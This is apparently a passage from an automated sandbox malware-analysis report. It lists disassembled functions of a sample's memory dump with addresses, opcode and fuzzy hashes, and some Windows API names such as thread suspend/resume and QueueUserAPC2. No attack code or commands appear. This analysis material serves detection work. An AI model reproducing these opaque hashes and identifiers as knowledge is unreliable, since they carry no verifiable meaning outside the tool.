                            • Associated: 00000001.00000002.1278222377.00007FF774A00000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1279022919.00007FF774B3B000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1279088365.00007FF774B9B000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1279163521.00007FF774C60000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1279163521.00007FF774C67000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1279163521.00007FF774C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1279219895.00007FF774C6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_7ff774a00000_C1ZsNxSer8.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: bb0bdc50d0a79732d1fbaaf7e6b7a9e629728ad14d5191bc8c1cbe51083c7122
                            • Instruction ID: 37d39b1818be0cb40298de0fb7d1e80c13859778f0d88a8332af966ac45354dd
                            • Opcode Fuzzy Hash: bb0bdc50d0a79732d1fbaaf7e6b7a9e629728ad14d5191bc8c1cbe51083c7122
                            • Instruction Fuzzy Hash: 8B42AC33F38B42C6EB109F26E4805A9B7A1FB45B88BA54536EE4D17B98DE38E451C710
                            Function 00007FF774A34160 Relevance: .6, Instructions: 583COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000001.00000002.1278689171.00007FF774A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF774A00000, based on PE: true
                            • Associated: 00000001.00000002.1278222377.00007FF774A00000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1279022919.00007FF774B3B000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1279088365.00007FF774B9B000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1279163521.00007FF774C60000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1279163521.00007FF774C67000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1279163521.00007FF774C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1279219895.00007FF774C6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_7ff774a00000_C1ZsNxSer8.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 1fb2c77b25ed1ccfa3b74ae9a7e59123a7fd091295756a8848aa9ea6743a7ee8
                            • Instruction ID: 78b57566d92488243571465de233ebf3bf540f1320405981882d13c885a44a72
                            • Opcode Fuzzy Hash: 1fb2c77b25ed1ccfa3b74ae9a7e59123a7fd091295756a8848aa9ea6743a7ee8
                            • Instruction Fuzzy Hash: BB32D373F78B45CAEB10DF66D880AACB7A1EB05788BA54136CE0D57B88DE38E455C350
                            Function 00007FF774A1FF90 Relevance: .4, Instructions: 432COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000001.00000002.1278689171.00007FF774A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF774A00000, based on PE: true
                            • Associated: 00000001.00000002.1278222377.00007FF774A00000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1279022919.00007FF774B3B000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1279088365.00007FF774B9B000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1279163521.00007FF774C60000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1279163521.00007FF774C67000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1279163521.00007FF774C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1279219895.00007FF774C6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_7ff774a00000_C1ZsNxSer8.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 874d07d0b63e12727b284f3094aca6d283b2919d332a0d816e76fe305952f5ec
                            • Instruction ID: d13da4f178f63b671cfd210f347025ba895e83d6917bb16506c80dc83f50609b
                            • Opcode Fuzzy Hash: 874d07d0b63e12727b284f3094aca6d283b2919d332a0d816e76fe305952f5ec
                            • Instruction Fuzzy Hash: F602CA73B38A85C6EA149F16D480A79B790EB85BA4F918232CB6D677D5CF3CE441D320
                            Function 00007FF774A1F9E4 Relevance: .4, Instructions: 357COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000001.00000002.1278689171.00007FF774A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF774A00000, based on PE: true
                            • Associated: 00000001.00000002.1278222377.00007FF774A00000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1279022919.00007FF774B3B000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1279088365.00007FF774B9B000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1279163521.00007FF774C60000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1279163521.00007FF774C67000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1279163521.00007FF774C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1279219895.00007FF774C6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_7ff774a00000_C1ZsNxSer8.jbxd
                            Similarity
                            • API ID: CounterPerformanceQuery
                            • String ID:
                            • API String ID: 2783962273-0
                            • Opcode ID: e816d686233bc00fa271f6222e436da18f7514f741235fe5f6e969e94f8297b3
                            • Instruction ID: 52fcc93506b83f67c9532f95ed15a8f70c06504bf21bef9f5730929746c1fdb8
                            • Opcode Fuzzy Hash: e816d686233bc00fa271f6222e436da18f7514f741235fe5f6e969e94f8297b3
                            • Instruction Fuzzy Hash: 0302B523A39B83D5EB51AF2694D0734A7B0BF49748FA58636DA4D133A1DF3CE4918220
                            Function 00007FF774A38BC0 Relevance: .3, Instructions: 332COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000001.00000002.1278689171.00007FF774A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF774A00000, based on PE: true
                            • Associated: 00000001.00000002.1278222377.00007FF774A00000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1279022919.00007FF774B3B000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1279088365.00007FF774B9B000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1279163521.00007FF774C60000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1279163521.00007FF774C67000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1279163521.00007FF774C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1279219895.00007FF774C6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_7ff774a00000_C1ZsNxSer8.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 1234fb6fc9fdbe2454c2e37c2c00e3cb25b3c3dd0762fcc38499df4434799227
                            • Instruction ID: 05252e362dd8856b9ff4833a34f503226f896dc7729f185ea1abadb0d7a47bef
                            • Opcode Fuzzy Hash: 1234fb6fc9fdbe2454c2e37c2c00e3cb25b3c3dd0762fcc38499df4434799227
                            • Instruction Fuzzy Hash: 86E1B073A39745D6EB95AF16D480738B7E1FB45B84F95823AC90E43294EF3DE0858321
                            Function 00007FF774AB4160 Relevance: .3, Instructions: 273COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000001.00000002.1278689171.00007FF774A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF774A00000, based on PE: true
                            • Associated: 00000001.00000002.1278222377.00007FF774A00000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1279022919.00007FF774B3B000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1279088365.00007FF774B9B000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1279163521.00007FF774C60000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1279163521.00007FF774C67000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1279163521.00007FF774C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1279219895.00007FF774C6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_7ff774a00000_C1ZsNxSer8.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 453bf3b22287000f81a5ec2596a3fa4ef9a653b6828c08814b5912e62688ddc6
                            • Instruction ID: 4ba25bb7a671336daa706505c5b38763b089c2aab831212f4308c68e64d4d633
                            • Opcode Fuzzy Hash: 453bf3b22287000f81a5ec2596a3fa4ef9a653b6828c08814b5912e62688ddc6
                            • Instruction Fuzzy Hash: 1AB1E733A29651C6E7649F17A580B7AE7E0FB81B84FA18031EA8C47B94DF3CD491DB10
                            Function 00007FF774A28AB0 Relevance: .3, Instructions: 273COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000001.00000002.1278689171.00007FF774A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF774A00000, based on PE: true
                            • Associated: 00000001.00000002.1278222377.00007FF774A00000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1279022919.00007FF774B3B000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1279088365.00007FF774B9B000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1279163521.00007FF774C60000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1279163521.00007FF774C67000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1279163521.00007FF774C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1279219895.00007FF774C6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_7ff774a00000_C1ZsNxSer8.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: e81833f11647e4d4ec49dfadb2e7185eedecc70ecef5022b32c5d3ead13eb584
                            • Instruction ID: b3ec8ddcd579ae0624a4925aee534070ad44bb10bd9608b80a420d7a753758b1
                            • Opcode Fuzzy Hash: e81833f11647e4d4ec49dfadb2e7185eedecc70ecef5022b32c5d3ead13eb584
                            • Instruction Fuzzy Hash: 13C19233A39A46D1EB449F06E8C0538B3A0FB857A8F95823AD96D93790CF3CE054D321
                            Function 00007FF774A32480 Relevance: .3, Instructions: 268COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000001.00000002.1278689171.00007FF774A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF774A00000, based on PE: true
                            • Associated: 00000001.00000002.1278222377.00007FF774A00000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1279022919.00007FF774B3B000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1279088365.00007FF774B9B000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1279163521.00007FF774C60000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1279163521.00007FF774C67000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1279163521.00007FF774C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1279219895.00007FF774C6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_7ff774a00000_C1ZsNxSer8.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: d39069bb3f1b925de6bb941b57d05fde1f5ae2aeb21a7ffe6707880de4ef7fdb
                            • Instruction ID: 24bb54c7781d3c6239442695b882cd8121a386bc46928614d6ee3ce39953aa0c
                            • Opcode Fuzzy Hash: d39069bb3f1b925de6bb941b57d05fde1f5ae2aeb21a7ffe6707880de4ef7fdb
                            • Instruction Fuzzy Hash: F7C18F73A39B86D2EB40EF06E890578B3A1FB457A8B958236D96D43794DF3CE050C321
                            Function 00007FF774A16BB6 Relevance: .2, Instructions: 198COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000001.00000002.1278689171.00007FF774A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF774A00000, based on PE: true
                            • Associated: 00000001.00000002.1278222377.00007FF774A00000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1279022919.00007FF774B3B000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1279088365.00007FF774B9B000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1279163521.00007FF774C60000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1279163521.00007FF774C67000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1279163521.00007FF774C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1279219895.00007FF774C6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_7ff774a00000_C1ZsNxSer8.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: ffda7dcb03f2a66212fc266a96e149d7d8717478e142e8c52720ffd4913da045
                            • Instruction ID: 78c31589d3ec263f5b3168612afd07d437730ce0a6da6503cdeaa823880985c6
                            • Opcode Fuzzy Hash: ffda7dcb03f2a66212fc266a96e149d7d8717478e142e8c52720ffd4913da045
                            • Instruction Fuzzy Hash: EA912E33939B82D6E650AF16A9C07A9B3B0FB49788FA18576D94D83761DF3CE041C721
                            Function 00007FF774A28F30 Relevance: .2, Instructions: 171COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000001.00000002.1278689171.00007FF774A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF774A00000, based on PE: true
                            • Associated: 00000001.00000002.1278222377.00007FF774A00000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1279022919.00007FF774B3B000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1279088365.00007FF774B9B000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1279163521.00007FF774C60000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1279163521.00007FF774C67000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1279163521.00007FF774C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1279219895.00007FF774C6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_7ff774a00000_C1ZsNxSer8.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: db1fbb49aca1fc5293637b942dc58e3bd9f3bdc412a1f0a433097ebfc995b2ff
                            • Instruction ID: fffe792b2d77e0524a4a6094a3fbb96c3fd2acaa722e68907636174f992faf80
                            • Opcode Fuzzy Hash: db1fbb49aca1fc5293637b942dc58e3bd9f3bdc412a1f0a433097ebfc995b2ff
                            • Instruction Fuzzy Hash: D951B923F3A74D81F9169B7B5181E79D1566F9ABC0E6DCB31E90E36690EF3DB0809110
                            Function 00007FF774A2F550 Relevance: .1, Instructions: 72COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000001.00000002.1278689171.00007FF774A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF774A00000, based on PE: true
                            • Associated: 00000001.00000002.1278222377.00007FF774A00000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1279022919.00007FF774B3B000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1279088365.00007FF774B9B000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1279163521.00007FF774C60000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1279163521.00007FF774C67000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1279163521.00007FF774C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1279219895.00007FF774C6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_7ff774a00000_C1ZsNxSer8.jbxd
                            Similarity
                            • API ID: CriticalSection$EnterLeave
                            • String ID:
                            • API String ID: 3168844106-0
                            • Opcode ID: 08b5094678a0a70fa924128cd3c95d310876888f50eb8db182c1c93b7b9fe1b6
                            • Instruction ID: 861d1c0f308e51f51117f9c99da86cf898388978f4473830d850df54923217cf
                            • Opcode Fuzzy Hash: 08b5094678a0a70fa924128cd3c95d310876888f50eb8db182c1c93b7b9fe1b6
                            • Instruction Fuzzy Hash: 5321CB23B3864392EBA89F37A2D5A7A5350EBC9780FA56131FE0C03E85DD1DD591A604
                            Function 00007FF774A0AB80 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 85libraryloaderCOMMON
                            Download Yara Rule
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.1278689171.00007FF774A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF774A00000, based on PE: true
                            • Associated: 00000001.00000002.1278222377.00007FF774A00000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1279022919.00007FF774B3B000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1279088365.00007FF774B9B000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1279163521.00007FF774C60000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1279163521.00007FF774C67000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1279163521.00007FF774C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1279219895.00007FF774C6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_7ff774a00000_C1ZsNxSer8.jbxd
                            Similarity
                            • API ID: ContextInitialize$AddressEnabledErrorFeaturesHandleLastModuleProcState
                            • String ID: InitializeContext2$kernel32.dll
                            • API String ID: 4102459504-3117029998
                            • Opcode ID: ae908663245adc436bddbdeaeefb791612a2dcc4c0698f10f7af4653a4f5a060
                            • Instruction ID: 4012178764f1a5d07d0e7111c5bb3b664c446c9c8b4f482aaa59ac8447803f46
                            • Opcode Fuzzy Hash: ae908663245adc436bddbdeaeefb791612a2dcc4c0698f10f7af4653a4f5a060
                            • Instruction Fuzzy Hash: 9B314327A3D746C2FA00AF56A984639E390BF94B94F950436D94D03BA4EF7CE546C730
                            Function 00007FF774A05EA0 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 83threadlibraryloaderCOMMON
                            Download Yara Rule
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.1278689171.00007FF774A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF774A00000, based on PE: true
                            • Associated: 00000001.00000002.1278222377.00007FF774A00000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1279022919.00007FF774B3B000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1279088365.00007FF774B9B000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1279163521.00007FF774C60000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1279163521.00007FF774C67000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1279163521.00007FF774C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1279219895.00007FF774C6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_7ff774a00000_C1ZsNxSer8.jbxd
                            Similarity
                            • API ID: Thread$AddressContextErrorLastLibraryLoadProcResumeSuspend
                            • String ID: QueueUserAPC2$kernel32
                            • API String ID: 3714266957-4022151419
                            • Opcode ID: 2c927c7249ad306362750963f21d316bcf2fc60d905bd8730f4bf37492db24bc
                            • Instruction ID: 0a04aeedad3bf67b9034a644bafc347695892c50587f1c733e134ae7809108e0
                            • Opcode Fuzzy Hash: 2c927c7249ad306362750963f21d316bcf2fc60d905bd8730f4bf37492db24bc
                            • Instruction Fuzzy Hash: 72319262A3C642C1EA10FF2BE8D8779A351BF55BE8F914230D86D466F4EF2CE4058720
                            Function 00007FF774A1DBE0 Relevance: 10.7, APIs: 7, Instructions: 227threadCOMMON
                            Download Yara Rule
                            APIs
                            Memory Dump Source
                            • Source File: 00000001.00000002.1278689171.00007FF774A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF774A00000, based on PE: true
                            • Associated: 00000001.00000002.1278222377.00007FF774A00000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1279022919.00007FF774B3B000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1279088365.00007FF774B9B000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1279163521.00007FF774C60000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1279163521.00007FF774C67000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1279163521.00007FF774C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1279219895.00007FF774C6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_7ff774a00000_C1ZsNxSer8.jbxd
                            Similarity
                            • API ID: SwitchThread
                            • String ID:
                            • API String ID: 115865932-0
                            • Opcode ID: c13f5500ea1206e8ec5f05ebe3918e2a796096b40ac2d42ce93c8136b207df3a
                            • Instruction ID: c7f51923bb02b6bfc4686f3abf16c4a7165eb991f10f90743a2d87c240571e42
                            • Opcode Fuzzy Hash: c13f5500ea1206e8ec5f05ebe3918e2a796096b40ac2d42ce93c8136b207df3a
                            • Instruction Fuzzy Hash: D4A18F33E39203D6F654BF27A9C0E75E2B5AF11358FA64936D82D866D1DE2DF4008632
                            Function 00007FF774A062A0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 51threadCOMMON
                            Download Yara Rule
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.1278689171.00007FF774A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF774A00000, based on PE: true
                            • Associated: 00000001.00000002.1278222377.00007FF774A00000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1279022919.00007FF774B3B000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1279088365.00007FF774B9B000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1279163521.00007FF774C60000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1279163521.00007FF774C67000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1279163521.00007FF774C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1279219895.00007FF774C6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_7ff774a00000_C1ZsNxSer8.jbxd
                            Similarity
                            • API ID: Current$Thread$DuplicateExceptionFailFastHandleProcessQueryRaiseVirtual
                            • String ID:
                            • API String ID: 510365852-3916222277
                            • Opcode ID: aac18b405e8186b4baee27d6e985e552b0b39ad9a33c4f5303744330f0df3245
                            • Instruction ID: 96a4585b32eab499e1bd32e7f39425c3b2f8ff340506ced03d66076eb7f5a4fb
                            • Opcode Fuzzy Hash: aac18b405e8186b4baee27d6e985e552b0b39ad9a33c4f5303744330f0df3245
                            • Instruction Fuzzy Hash: 4A116D73618B81CAD760AF26A481199B354FB447B8FA50339E6BD4B6D6DF78D4428700
                            Function 00007FF774A2D600 Relevance: 9.2, APIs: 6, Instructions: 189threadCOMMON
                            Download Yara Rule
                            APIs
                            Memory Dump Source
                            • Source File: 00000001.00000002.1278689171.00007FF774A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF774A00000, based on PE: true
                            • Associated: 00000001.00000002.1278222377.00007FF774A00000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1279022919.00007FF774B3B000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1279088365.00007FF774B9B000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1279163521.00007FF774C60000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1279163521.00007FF774C67000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1279163521.00007FF774C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1279219895.00007FF774C6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_7ff774a00000_C1ZsNxSer8.jbxd
                            Similarity
                            • API ID: SwitchThread
                            • String ID:
                            • API String ID: 115865932-0
                            • Opcode ID: 01a89e310edcfaae1fb5271710d384d3bec56e2db4509541efe95d0668bf02e1
                            • Instruction ID: 66041437c22579d18eae4084d8ac3e7530474e45ece95567cd0a39abe250b9b7
                            • Opcode Fuzzy Hash: 01a89e310edcfaae1fb5271710d384d3bec56e2db4509541efe95d0668bf02e1
                            • Instruction Fuzzy Hash: 45816A37E3C203D7F2547F2798C0E75A2916F80358FA64139D86D966E2DE2DF441AA32
                            Function 00007FF774A2A150 Relevance: 9.2, APIs: 6, Instructions: 180COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000001.00000002.1278689171.00007FF774A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF774A00000, based on PE: true
                            • Associated: 00000001.00000002.1278222377.00007FF774A00000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1279022919.00007FF774B3B000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1279088365.00007FF774B9B000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1279163521.00007FF774C60000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1279163521.00007FF774C67000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1279163521.00007FF774C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1279219895.00007FF774C6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_7ff774a00000_C1ZsNxSer8.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 775818c12bc7e14b7563a559daced99b5b62968cc71ab8af9d358da41de0e075
                            • Instruction ID: 99bf247d5f96ff6ff1369d3a851b2a0d98d421a0bb2b82ea6e70a6616b6ea103
                            • Opcode Fuzzy Hash: 775818c12bc7e14b7563a559daced99b5b62968cc71ab8af9d358da41de0e075
                            • Instruction Fuzzy Hash: 5571A623B39642C2FB14BF5395C06B9E3A1BF94BA8FAA4436D90D17695DF3CE4509320
                            Function 00007FF774A2FAE0 Relevance: 7.8, APIs: 6, Instructions: 317COMMON
                            Download Yara Rule
                            APIs
                            Memory Dump Source
                            • Source File: 00000001.00000002.1278689171.00007FF774A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF774A00000, based on PE: true
                            • Associated: 00000001.00000002.1278222377.00007FF774A00000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1279022919.00007FF774B3B000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1279088365.00007FF774B9B000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1279163521.00007FF774C60000.00000004.00000001.01000000.00000003.sdmpDownload File
